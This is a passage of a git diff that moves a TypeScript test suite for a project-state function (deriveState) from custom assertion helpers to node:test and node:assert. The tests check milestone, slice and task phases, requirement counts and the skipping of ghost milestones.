+      assert.ok(state.activeSlice !== null, 'activeSlice is not null');
+      assert.deepStrictEqual(state.activeSlice?.id, 'S01', 'activeSlice id is S01');
+      assert.deepStrictEqual(state.activeTask, null, 'activeTask is null');
+      assert.deepStrictEqual(state.progress?.slices?.done, 0, 'slices done = 0');
+      assert.deepStrictEqual(state.progress?.slices?.total, 1, 'slices total = 1');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 4: roadmap + plan with incomplete tasks → executing ──────────
-  console.log('\n=== roadmap + plan with incomplete tasks → executing ===');
-  {
+  test('roadmap + plan with incomplete tasks → executing', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: Test Milestone
@@ -168,19 +163,18 @@ async function main(): Promise<void> {
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'executing', 'phase is executing');
-      assertTrue(state.activeTask !== null, 'activeTask is not null');
-      assertEq(state.activeTask?.id, 'T01', 'activeTask id is T01');
-      assertEq(state.progress?.tasks?.done, 0, 'tasks done = 0');
-      assertEq(state.progress?.tasks?.total, 2, 'tasks total = 2');
+      assert.deepStrictEqual(state.phase, 'executing', 'phase is executing');
+      assert.ok(state.activeTask !== null, 'activeTask is not null');
+      assert.deepStrictEqual(state.activeTask?.id, 'T01', 'activeTask id is T01');
+      assert.deepStrictEqual(state.progress?.tasks?.done, 0, 'tasks done = 0');
+      assert.deepStrictEqual(state.progress?.tasks?.total, 2, 'tasks total = 2');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 5: executing + continue file → resume message ─────────────
-  console.log('\n=== executing + continue file → resume message ===');
-  {
+  test('executing + continue file → resume message', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: Test Milestone
@@ -228,21 +222,20 @@ Continue from step 2.
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'executing', 'interrupted: phase is executing');
-      assertTrue(state.activeTask !== null, 'interrupted: activeTask is not null');
-      assertEq(state.activeTask?.id, 'T01', 'interrupted: activeTask id is T01');
-      assertTrue(
+      assert.deepStrictEqual(state.phase, 'executing', 'interrupted: phase is executing');
+      assert.ok(state.activeTask !== null, 'interrupted: activeTask is not null');
+      assert.deepStrictEqual(state.activeTask?.id, 'T01', 'interrupted: activeTask id is T01');
+      assert.ok(
         state.nextAction.includes('Resume') || state.nextAction.includes('resume') || state.nextAction.includes('continue.md'),
         'interrupted: nextAction mentions Resume/resume/continue.md'
       );
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 6: all tasks done, slice not [x] → summarizing ──────────────
-  console.log('\n=== all tasks done, slice not [x] → summarizing ===');
-  {
+  test('all tasks done, slice not [x] → summarizing', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: Test Milestone
@@ -271,24 +264,23 @@ Continue from step 2.
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'summarizing', 'summarizing: phase is summarizing');
-      assertTrue(state.activeSlice !== null, 'summarizing: activeSlice is not null');
-      assertEq(state.activeSlice?.id, 'S01', 'summarizing: activeSlice id is S01');
-      assertEq(state.activeTask, null, 'summarizing: activeTask is null');
-      assertTrue(
+      assert.deepStrictEqual(state.phase, 'summarizing', 'summarizing: phase is summarizing');
+      assert.ok(state.activeSlice !== null, 'summarizing: activeSlice is not null');
+      assert.deepStrictEqual(state.activeSlice?.id, 'S01', 'summarizing: activeSlice id is S01');
+      assert.deepStrictEqual(state.activeTask, null, 'summarizing: activeTask is null');
+      assert.ok(
         state.nextAction.toLowerCase().includes('summary') || state.nextAction.toLowerCase().includes('complete'),
         'summarizing: nextAction mentions summary or complete'
       );
-      assertEq(state.progress?.tasks?.done, 2, 'summarizing: tasks done = 2');
-      assertEq(state.progress?.tasks?.total, 2, 'summarizing: tasks total = 2');
+      assert.deepStrictEqual(state.progress?.tasks?.done, 2, 'summarizing: tasks done = 2');
+      assert.deepStrictEqual(state.progress?.tasks?.total, 2, 'summarizing: tasks total = 2');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 7: all milestones complete → complete ────────────────────────
-  console.log('\n=== all milestones complete → complete ===');
-  {
+  test('all milestones complete → complete', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: Test Milestone
@@ -306,23 +298,22 @@ Continue from step 2.
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'complete', 'complete: phase is complete');
-      assertEq(state.activeSlice, null, 'complete: activeSlice is null');
-      assertEq(state.activeTask, null, 'complete: activeTask is null');
-      assertTrue(
+      assert.deepStrictEqual(state.phase, 'complete', 'complete: phase is complete');
+      assert.deepStrictEqual(state.activeSlice, null, 'complete: activeSlice is null');
+      assert.deepStrictEqual(state.activeTask, null, 'complete: activeTask is null');
+      assert.ok(
         state.nextAction.toLowerCase().includes('complete'),
         'complete: nextAction mentions complete'
       );
-      assertEq(state.registry.length, 1, 'complete: registry has 1 entry');
-      assertEq(state.registry[0]?.status, 'complete', 'complete: registry[0] status is complete');
+      assert.deepStrictEqual(state.registry.length, 1, 'complete: registry has 1 entry');
+      assert.deepStrictEqual(state.registry[0]?.status, 'complete', 'complete: registry[0] status is complete');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 7b: complete with active requirements → surfaces unmapped reqs ──
-  console.log('\n=== complete with active requirements → surfaces unmapped reqs ===');
-  {
+  test('complete with active requirements → surfaces unmapped reqs', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: Test Milestone
@@ -355,23 +346,22 @@ Continue from step 2.
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'complete', 'complete-with-reqs: phase is complete');
-      assertTrue(
+      assert.deepStrictEqual(state.phase, 'complete', 'complete-with-reqs: phase is complete');
+      assert.ok(
         state.nextAction.includes('2 active requirements'),
         'complete-with-reqs: nextAction mentions 2 active requirements'
       );
-      assertTrue(
+      assert.ok(
         state.nextAction.includes('REQUIREMENTS.md'),
         'complete-with-reqs: nextAction mentions REQUIREMENTS.md'
       );
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 7c: complete with no active requirements → standard message ──
-  console.log('\n=== complete with no active requirements → standard message ===');
-  {
+  test('complete with no active requirements → standard message', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: Test Milestone
@@ -396,16 +386,15 @@ Continue from step 2.
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'complete', 'complete-no-active-reqs: phase is complete');
-      assertEq(state.nextAction, 'All milestones complete.', 'complete-no-active-reqs: standard completion message');
+      assert.deepStrictEqual(state.phase, 'complete', 'complete-no-active-reqs: phase is complete');
+      assert.deepStrictEqual(state.nextAction, 'All milestones complete.', 'complete-no-active-reqs: standard completion message');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 8: blocked dependencies ──────────────────────────────────────
-  console.log('\n=== blocked dependencies ===');
-  {
+  test('blocked dependencies', async () => {
     // Case A: S01 active (deps satisfied), S02 blocked on S01
     const base1 = createFixtureBase();
     try {
@@ -436,8 +425,8 @@ Continue from step 2.
 
       const state1 = await deriveState(base1);
 
-      assertEq(state1.phase, 'executing', 'blocked-A: phase is executing (S01 active)');
-      assertEq(state1.activeSlice?.id, 'S01', 'blocked-A: activeSlice is S01');
+      assert.deepStrictEqual(state1.phase, 'executing', 'blocked-A: phase is executing (S01 active)');
+      assert.deepStrictEqual(state1.activeSlice?.id, 'S01', 'blocked-A: activeSlice is S01');
     } finally {
       cleanup(base1);
     }
@@ -457,17 +446,16 @@ Continue from step 2.
 
       const state2 = await deriveState(base2);
 
-      assertEq(state2.phase, 'blocked', 'blocked-B: phase is blocked');
-      assertEq(state2.activeSlice, null, 'blocked-B: activeSlice is null');
-      assertTrue(state2.blockers.length > 0, 'blocked-B: blockers array is non-empty');
+      assert.deepStrictEqual(state2.phase, 'blocked', 'blocked-B: phase is blocked');
+      assert.deepStrictEqual(state2.activeSlice, null, 'blocked-B: activeSlice is null');
+      assert.ok(state2.blockers.length > 0, 'blocked-B: blockers array is non-empty');
     } finally {
       cleanup(base2);
     }
-  }
+  });
 
   // ─── Test 9: multi-milestone registry ──────────────────────────────────
-  console.log('\n=== multi-milestone registry ===');
-  {
+  test('multi-milestone registry', async () => {
     const base = createFixtureBase();
     try {
       // M001: complete (all slices done)
@@ -501,24 +489,23 @@ Continue from step 2.
 
       const state = await deriveState(base);
 
-      assertEq(state.registry.length, 3, 'multi-ms: registry has 3 entries');
-      assertEq(state.registry[0]?.id, 'M001', 'multi-ms: registry[0] is M001');
-      assertEq(state.registry[0]?.status, 'complete', 'multi-ms: M001 is complete');
-      assertEq(state.registry[1]?.id, 'M002', 'multi-ms: registry[1] is M002');
-      assertEq(state.registry[1]?.status, 'active', 'multi-ms: M002 is active');
-      assertEq(state.registry[2]?.id, 'M003', 'multi-ms: registry[2] is M003');
-      assertEq(state.registry[2]?.status, 'pending', 'multi-ms: M003 is pending');
-      assertEq(state.activeMilestone?.id, 'M002', 'multi-ms: activeMilestone is M002');
-      assertEq(state.progress?.milestones?.done, 1, 'multi-ms: milestones done = 1');
-      assertEq(state.progress?.milestones?.total, 3, 'multi-ms: milestones total = 3');
+      assert.deepStrictEqual(state.registry.length, 3, 'multi-ms: registry has 3 entries');
+      assert.deepStrictEqual(state.registry[0]?.id, 'M001', 'multi-ms: registry[0] is M001');
+      assert.deepStrictEqual(state.registry[0]?.status, 'complete', 'multi-ms: M001 is complete');
+      assert.deepStrictEqual(state.registry[1]?.id, 'M002', 'multi-ms: registry[1] is M002');
+      assert.deepStrictEqual(state.registry[1]?.status, 'active', 'multi-ms: M002 is active');
+      assert.deepStrictEqual(state.registry[2]?.id, 'M003', 'multi-ms: registry[2] is M003');
+      assert.deepStrictEqual(state.registry[2]?.status, 'pending', 'multi-ms: M003 is pending');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002', 'multi-ms: activeMilestone is M002');
+      assert.deepStrictEqual(state.progress?.milestones?.done, 1, 'multi-ms: milestones done = 1');
+      assert.deepStrictEqual(state.progress?.milestones?.total, 3, 'multi-ms: milestones total = 3');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 10: requirements integration ─────────────────────────────────
-  console.log('\n=== requirements integration ===');
-  {
+  test('requirements integration', async () => {
     const base = createFixtureBase();
     try {
       writeRequirements(base, `# Requirements
@@ -559,20 +546,19 @@ Continue from step 2.
       // Need at least an empty milestones dir for deriveState
       const state = await deriveState(base);
 
-      assertTrue(state.requirements !== undefined, 'requirements: requirements object exists');
-      assertEq(state.requirements?.active, 2, 'requirements: active = 2');
-      assertEq(state.requirements?.validated, 1, 'requirements: validated = 1');
-      assertEq(state.requirements?.deferred, 2, 'requirements: deferred = 2');
-      assertEq(state.requirements?.outOfScope, 1, 'requirements: outOfScope = 1');
-      assertEq(state.requirements?.total, 6, 'requirements: total = 6 (sum of all)');
+      assert.ok(state.requirements !== undefined, 'requirements: requirements object exists');
+      assert.deepStrictEqual(state.requirements?.active, 2, 'requirements: active = 2');
+      assert.deepStrictEqual(state.requirements?.validated, 1, 'requirements: validated = 1');
+      assert.deepStrictEqual(state.requirements?.deferred, 2, 'requirements: deferred = 2');
+      assert.deepStrictEqual(state.requirements?.outOfScope, 1, 'requirements: outOfScope = 1');
+      assert.deepStrictEqual(state.requirements?.total, 6, 'requirements: total = 6 (sum of all)');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 11: all slices [x], no summary → completing-milestone ────────
-  console.log('\n=== all slices [x], no summary → completing-milestone ===');
-  {
+  test('all slices [x], no summary → completing-milestone', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: Test Milestone
@@ -592,27 +578,26 @@ Continue from step 2.
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'completing-milestone', 'completing-ms: phase is completing-milestone');
-      assertTrue(state.activeMilestone !== null, 'completing-ms: activeMilestone is not null');
-      assertEq(state.activeMilestone?.id, 'M001', 'completing-ms: activeMilestone id is M001');
-      assertEq(state.activeSlice, null, 'completing-ms: activeSlice is null');
-      assertEq(state.activeTask, null, 'completing-ms: activeTask is null');
-      assertEq(state.registry.length, 1, 'completing-ms: registry has 1 entry');
-      assertEq(state.registry[0]?.status, 'active', 'completing-ms: registry[0] status is active (not complete)');
-      assertEq(state.progress?.slices?.done, 2, 'completing-ms: slices done = 2');
-      assertEq(state.progress?.slices?.total, 2, 'completing-ms: slices total = 2');
-      assertTrue(
+      assert.deepStrictEqual(state.phase, 'completing-milestone', 'completing-ms: phase is completing-milestone');
+      assert.ok(state.activeMilestone !== null, 'completing-ms: activeMilestone is not null');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'completing-ms: activeMilestone id is M001');
+      assert.deepStrictEqual(state.activeSlice, null, 'completing-ms: activeSlice is null');
+      assert.deepStrictEqual(state.activeTask, null, 'completing-ms: activeTask is null');
+      assert.deepStrictEqual(state.registry.length, 1, 'completing-ms: registry has 1 entry');
+      assert.deepStrictEqual(state.registry[0]?.status, 'active', 'completing-ms: registry[0] status is active (not complete)');
+      assert.deepStrictEqual(state.progress?.slices?.done, 2, 'completing-ms: slices done = 2');
+      assert.deepStrictEqual(state.progress?.slices?.total, 2, 'completing-ms: slices total = 2');
+      assert.ok(
         state.nextAction.toLowerCase().includes('summary') || state.nextAction.toLowerCase().includes('complete'),
         'completing-ms: nextAction mentions summary or complete'
       );
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 12: all slices [x], summary exists → complete ───────────────
-  console.log('\n=== all slices [x], summary exists → complete ===');
-  {
+  test('all slices [x], summary exists → complete', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: Test Milestone
@@ -630,19 +615,18 @@ Continue from step 2.
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'complete', 'summary-exists: phase is complete');
-      assertEq(state.registry.length, 1, 'summary-exists: registry has 1 entry');
-      assertEq(state.registry[0]?.status, 'complete', 'summary-exists: registry[0] status is complete');
-      assertEq(state.activeSlice, null, 'summary-exists: activeSlice is null');
-      assertEq(state.activeTask, null, 'summary-exists: activeTask is null');
+      assert.deepStrictEqual(state.phase, 'complete', 'summary-exists: phase is complete');
+      assert.deepStrictEqual(state.registry.length, 1, 'summary-exists: registry has 1 entry');
+      assert.deepStrictEqual(state.registry[0]?.status, 'complete', 'summary-exists: registry[0] status is complete');
+      assert.deepStrictEqual(state.activeSlice, null, 'summary-exists: activeSlice is null');
+      assert.deepStrictEqual(state.activeTask, null, 'summary-exists: activeTask is null');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test 13: multi-milestone completing-milestone ─────────────────────
-  console.log('\n=== multi-milestone completing-milestone ===');
-  {
+  test('multi-milestone completing-milestone', async () => {
     const base = createFixtureBase();
     try {
       // M001: all slices done + summary exists → complete
@@ -687,29 +671,28 @@ Continue from step 2.
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'completing-milestone', 'multi-completing: phase is completing-milestone');
-      assertEq(state.activeMilestone?.id, 'M002', 'multi-completing: activeMilestone is M002');
-      assertEq(state.activeSlice, null, 'multi-completing: activeSlice is null');
-      assertEq(state.activeTask, null, 'multi-completing: activeTask is null');
-      assertEq(state.registry.length, 3, 'multi-completing: registry has 3 entries');
-      assertEq(state.registry[0]?.id, 'M001', 'multi-completing: registry[0] is M001');
-      assertEq(state.registry[0]?.status, 'complete', 'multi-completing: M001 is complete');
-      assertEq(state.registry[1]?.id, 'M002', 'multi-completing: registry[1] is M002');
-      assertEq(state.registry[1]?.status, 'active', 'multi-completing: M002 is active (completing-milestone)');
-      assertEq(state.registry[2]?.id, 'M003', 'multi-completing: registry[2] is M003');
-      assertEq(state.registry[2]?.status, 'pending', 'multi-completing: M003 is pending');
-      assertEq(state.progress?.milestones?.done, 1, 'multi-completing: milestones done = 1');
-      assertEq(state.progress?.milestones?.total, 3, 'multi-completing: milestones total = 3');
-      assertEq(state.progress?.slices?.done, 2, 'multi-completing: slices done = 2');
-      assertEq(state.progress?.slices?.total, 2, 'multi-completing: slices total = 2');
+      assert.deepStrictEqual(state.phase, 'completing-milestone', 'multi-completing: phase is completing-milestone');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002', 'multi-completing: activeMilestone is M002');
+      assert.deepStrictEqual(state.activeSlice, null, 'multi-completing: activeSlice is null');
+      assert.deepStrictEqual(state.activeTask, null, 'multi-completing: activeTask is null');
+      assert.deepStrictEqual(state.registry.length, 3, 'multi-completing: registry has 3 entries');
+      assert.deepStrictEqual(state.registry[0]?.id, 'M001', 'multi-completing: registry[0] is M001');
+      assert.deepStrictEqual(state.registry[0]?.status, 'complete', 'multi-completing: M001 is complete');
+      assert.deepStrictEqual(state.registry[1]?.id, 'M002', 'multi-completing: registry[1] is M002');
+      assert.deepStrictEqual(state.registry[1]?.status, 'active', 'multi-completing: M002 is active (completing-milestone)');
+      assert.deepStrictEqual(state.registry[2]?.id, 'M003', 'multi-completing: registry[2] is M003');
+      assert.deepStrictEqual(state.registry[2]?.status, 'pending', 'multi-completing: M003 is pending');
+      assert.deepStrictEqual(state.progress?.milestones?.done, 1, 'multi-completing: milestones done = 1');
+      assert.deepStrictEqual(state.progress?.milestones?.total, 3, 'multi-completing: milestones total = 3');
+      assert.deepStrictEqual(state.progress?.slices?.done, 2, 'multi-completing: slices done = 2');
+      assert.deepStrictEqual(state.progress?.slices?.total, 2, 'multi-completing: slices total = 2');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ═══ Milestone with summary but no roadmap → complete ═══════════════════
   {
-    console.log('\n=== milestone with summary and no roadmap → complete ===');
     const base = createFixtureBase();
     try {
       // M001, M002: completed milestones with summaries but no roadmaps
@@ -726,17 +709,17 @@ Continue from step 2.
 
       const state = await deriveState(base);
 
-      assertEq(state.phase, 'planning', 'summary-no-roadmap: phase is planning (active is M003)');
-      assertEq(state.activeMilestone?.id, 'M003', 'summary-no-roadmap: active milestone is M003');
-      assertEq(state.activeMilestone?.title, 'Polish', 'summary-no-roadmap: active title is Polish');
-      assertEq(state.registry.length, 3, 'summary-no-roadmap: registry has 3 entries');
-      assertEq(state.registry[0]?.status, 'complete', 'summary-no-roadmap: M001 is complete');
-      assertEq(state.registry[0]?.title, 'Bootstrap', 'summary-no-roadmap: M001 title from summary');
-      assertEq(state.registry[1]?.status, 'complete', 'summary-no-roadmap: M002 is complete');
-      assertEq(state.registry[1]?.title, 'Core Features', 'summary-no-roadmap: M002 title from summary');
-      assertEq(state.registry[2]?.status, 'active', 'summary-no-roadmap: M003 is active');
-      assertEq(state.progress?.milestones?.done, 2, 'summary-no-roadmap: milestones done = 2');
-      assertEq(state.progress?.milestones?.total, 3, 'summary-no-roadmap: milestones total = 3');
+      assert.deepStrictEqual(state.phase, 'planning', 'summary-no-roadmap: phase is planning (active is M003)');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M003', 'summary-no-roadmap: active milestone is M003');
+      assert.deepStrictEqual(state.activeMilestone?.title, 'Polish', 'summary-no-roadmap: active title is Polish');
+      assert.deepStrictEqual(state.registry.length, 3, 'summary-no-roadmap: registry has 3 entries');
+      assert.deepStrictEqual(state.registry[0]?.status, 'complete', 'summary-no-roadmap: M001 is complete');
+      assert.deepStrictEqual(state.registry[0]?.title, 'Bootstrap', 'summary-no-roadmap: M001 title from summary');
+      assert.deepStrictEqual(state.registry[1]?.status, 'complete', 'summary-no-roadmap: M002 is complete');
+      assert.deepStrictEqual(state.registry[1]?.title, 'Core Features', 'summary-no-roadmap: M002 title from summary');
+      assert.deepStrictEqual(state.registry[2]?.status, 'active', 'summary-no-roadmap: M003 is active');
+      assert.deepStrictEqual(state.progress?.milestones?.done, 2, 'summary-no-roadmap: milestones done = 2');
+      assert.deepStrictEqual(state.progress?.milestones?.total, 3, 'summary-no-roadmap: milestones total = 3');
     } finally {
       cleanup(base);
     }
@@ -744,7 +727,6 @@ Continue from step 2.
 
   // ═══ All milestones have summary but no roadmap → complete ═════════════
   {
-    console.log('\n=== all milestones summary-only → complete ===');
     const base = createFixtureBase();
     try {
       const m1dir = join(base, '.gsd', 'milestones', 'M001');
@@ -752,16 +734,15 @@ Continue from step 2.
       writeFileSync(join(m1dir, 'M001-SUMMARY.md'), '---\ntitle: Done\n---\nAll done.');
 
       const state = await deriveState(base);
-      assertEq(state.phase, 'complete', 'all-summary-only: phase is complete');
-      assertEq(state.registry[0]?.status, 'complete', 'all-summary-only: M001 is complete');
+      assert.deepStrictEqual(state.phase, 'complete', 'all-summary-only: phase is complete');
+      assert.deepStrictEqual(state.registry[0]?.status, 'complete', 'all-summary-only: M001 is complete');
     } finally {
       cleanup(base);
     }
   }
 
   // ─── Empty plan (zero tasks) stays in planning, not summarizing (#454) ──
-  console.log('\n=== empty plan → planning (not summarizing) ===');
-  {
+  test('empty plan → planning (not summarizing)', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `---
@@ -786,17 +767,16 @@ slice: S01
 ## Tasks
 `);
       const state = await deriveState(base);
-      assertEq(state.phase, 'planning', 'empty plan stays in planning');
-      assertEq(state.activeSlice?.id, 'S01', 'active slice is S01');
-      assertEq(state.activeTask, null, 'no active task');
+      assert.deepStrictEqual(state.phase, 'planning', 'empty plan stays in planning');
+      assert.deepStrictEqual(state.activeSlice?.id, 'S01', 'active slice is S01');
+      assert.deepStrictEqual(state.activeTask, null, 'no active task');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test: completed M001 (summary, no validation) skipped for active M003 (#864) ────
-  console.log('\n=== completed milestone with summary but no validation is not active (#864) ===');
-  {
+  test('completed milestone with summary but no validation is not active (#864)', async () => {
     const base = createFixtureBase();
     try {
       // M001: all slices done, has summary, no validation
@@ -806,17 +786,16 @@ slice: S01
       writeRoadmap(base, 'M003', `# M003: Active Milestone\n\n**Vision:** Do stuff.\n\n## Slices\n\n- [ ] **S01: Work slice** \`risk:low\` \`depends:[]\`\n  > Needs work.\n`);
 
       const state = await deriveState(base);
-      assertEq(state.activeMilestone?.id, 'M003', 'active milestone is M003, not completed M001');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M003', 'active milestone is M003, not completed M001');
       const m001Entry = state.registry.find(e => e.id === 'M001');
-      assertEq(m001Entry?.status, 'complete', 'M001 is marked complete despite no validation');
+      assert.deepStrictEqual(m001Entry?.status, 'complete', 'M001 is marked complete despite no validation');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test: completed M001 with summary AND validation is complete (#864) ────
-  console.log('\n=== completed milestone with summary and validation is complete ===');
-  {
+  test('completed milestone with summary and validation is complete', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: First Milestone\n\n**Vision:** Done.\n\n## Slices\n\n- [x] **S01: Done slice** \`risk:low\` \`depends:[]\`\n  > Completed.\n`);
@@ -825,32 +804,30 @@ slice: S01
       writeRoadmap(base, 'M003', `# M003: Active Milestone\n\n**Vision:** Do stuff.\n\n## Slices\n\n- [ ] **S01: Work slice** \`risk:low\` \`depends:[]\`\n  > Needs work.\n`);
 
       const state = await deriveState(base);
-      assertEq(state.activeMilestone?.id, 'M003', 'active milestone is M003');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M003', 'active milestone is M003');
       const m001Entry = state.registry.find(e => e.id === 'M001');
-      assertEq(m001Entry?.status, 'complete', 'M001 with both summary and validation is complete');
+      assert.deepStrictEqual(m001Entry?.status, 'complete', 'M001 with both summary and validation is complete');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test: all slices done, no summary, no validation → needs validation (#864) ────
-  console.log('\n=== all slices done, no summary, no validation → validating-milestone ===');
-  {
+  test('all slices done, no summary, no validation → validating-milestone', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: First Milestone\n\n**Vision:** Validate me.\n\n## Slices\n\n- [x] **S01: Done slice** \`risk:low\` \`depends:[]\`\n  > Completed.\n`);
       // No summary, no validation — this should be active for validation
 
       const state = await deriveState(base);
-      assertEq(state.activeMilestone?.id, 'M001', 'M001 is active for validation');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'M001 is active for validation');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test: all slices done, validation pass, no summary → needs completion (#864) ────
-  console.log('\n=== all slices done, validation pass, no summary → completing-milestone ===');
-  {
+  test('all slices done, validation pass, no summary → completing-milestone', async () => {
     const base = createFixtureBase();
     try {
       writeRoadmap(base, 'M001', `# M001: First Milestone\n\n**Vision:** Complete me.\n\n## Slices\n\n- [x] **S01: Done slice** \`risk:low\` \`depends:[]\`\n  > Completed.\n`);
@@ -858,15 +835,14 @@ slice: S01
       // No summary — validated but not yet completed
 
       const state = await deriveState(base);
-      assertEq(state.activeMilestone?.id, 'M001', 'M001 is active for completion');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M001', 'M001 is active for completion');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test: unchecked roadmap slices + summary → complete (summary is terminal) ────
-  console.log('\n=== unchecked roadmap slices + summary → complete (summary is terminal) ===');
-  {
+  test('unchecked roadmap slices + summary → complete (summary is terminal)', async () => {
     const base = createFixtureBase();
     try {
       // M001: roadmap has unchecked slices but a summary exists — should be complete
@@ -877,16 +853,15 @@ slice: S01
 
       const state = await deriveState(base);
       const m001Entry = state.registry.find(e => e.id === 'M001');
-      assertEq(m001Entry?.status, 'complete', 'M001 with unchecked roadmap + summary is complete');
-      assertEq(state.activeMilestone?.id, 'M002', 'active milestone is M002, not M001');
+      assert.deepStrictEqual(m001Entry?.status, 'complete', 'M001 with unchecked roadmap + summary is complete');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002', 'active milestone is M002, not M001');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test: unchecked roadmap + summary counts toward completeMilestoneIds (deps) ────
-  console.log('\n=== unchecked roadmap + summary satisfies dependency ===');
-  {
+  test('unchecked roadmap + summary satisfies dependency', async () => {
     const base = createFixtureBase();
     try {
       // M001: unchecked roadmap + summary → complete
@@ -899,17 +874,16 @@ slice: S01
       writeFileSync(join(contextDir, 'M002-CONTEXT.md'), '---\ndepends_on:\n  - M001\n---\n\n# M002 Context\n\nDepends on M001.');
 
       const state = await deriveState(base);
-      assertEq(state.activeMilestone?.id, 'M002', 'M002 is active — M001 dependency satisfied via summary');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002', 'M002 is active — M001 dependency satisfied via summary');
       const m002Entry = state.registry.find(e => e.id === 'M002');
-      assertEq(m002Entry?.status, 'active', 'M002 status is active, not pending');
+      assert.deepStrictEqual(m002Entry?.status, 'active', 'M002 status is active, not pending');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test: ghost milestone (only META.json) is skipped ───────────────
-  console.log('\n=== ghost milestone (only META.json) is skipped ===');
-  {
+  test('ghost milestone (only META.json) is skipped', async () => {
     const base = createFixtureBase();
     try {
       // Create a ghost milestone directory with only META.json
@@ -918,21 +892,20 @@ slice: S01
       writeFileSync(join(ghostDir, 'META.json'), JSON.stringify({ id: 'M001' }));
 
       // isGhostMilestone should detect it
-      assertTrue(isGhostMilestone(base, 'M001'), 'M001 is a ghost milestone');
+      assert.ok(isGhostMilestone(base, 'M001'), 'M001 is a ghost milestone');
 
       // deriveState should treat this as pre-planning (no real milestones)
       const state = await deriveState(base);
-      assertEq(state.phase, 'pre-planning', 'ghost-only: phase is pre-planning');
-      assertEq(state.activeMilestone, null, 'ghost-only: no active milestone');
-      assertEq(state.registry.length, 0, 'ghost-only: registry is empty');
+      assert.deepStrictEqual(state.phase, 'pre-planning', 'ghost-only: phase is pre-planning');
+      assert.deepStrictEqual(state.activeMilestone, null, 'ghost-only: no active milestone');
+      assert.deepStrictEqual(state.registry.length, 0, 'ghost-only: registry is empty');
     } finally {
       cleanup(base);
     }
-  }
+  });
 
   // ─── Test: ghost milestone skipped when real milestones exist ──────────
-  console.log('\n=== ghost milestone skipped alongside real milestones ===');
-  {
+  test('ghost milestone skipped alongside real milestones', async () => {
     const base = createFixtureBase();
     try {
       // M001: ghost (only META.json)
@@ -946,20 +919,48 @@ slice: S01
       writeFileSync(join(realDir, 'M002-CONTEXT.md'), '# Real Milestone\n\nThis has content.');
 
       const state = await deriveState(base);
-      assertEq(state.activeMilestone?.id, 'M002', 'ghost+real: active milestone is M002');
+      assert.deepStrictEqual(state.activeMilestone?.id, 'M002', 'ghost+real: active milestone is M002');
       // Ghost M001 should not appear in the registry
       const m001Entry = state.registry.find(e => e.id === 'M001');
-      assertEq(m001Entry, undefined, 'ghost+real: M001 not in registry');
-      assertEq(state.registry.length, 1, 'ghost+real: registry has 1 entry');
-      assertEq(state.registry[0]?.status, 'active', 'ghost+real: M002 is active');
+      assert.deepStrictEqual(m001Entry, undefined, 'ghost+real: M001 not in registry');
+      assert.deepStrictEqual(state.registry.length, 1, 'ghost+real: registry has 1 entry');
+      assert.deepStrictEqual(state.registry[0]?.status, 'active', 'ghost+real: M002 is active');
     } finally {
       cleanup(base);
     }
-  }
+  });
+
+  // ─── Test: queued milestone with worktree not flagged as ghost (#2921) ──
+  test('queued milestone with worktree not flagged as ghost (#2921)', async () => {
+    const base = createFixtureBase();
+    try {
+      // Create a milestone directory with only an empty slices subdir — no content files.
+      // This would normally be a ghost, but it has a worktree directory.
+      const milestoneDir = join(base, '.gsd', 'milestones', 'M002');
+      mkdirSync(join(milestoneDir, 'slices'), { recursive: true });
+
+      // Create a worktree directory for M002, simulating an active worktree
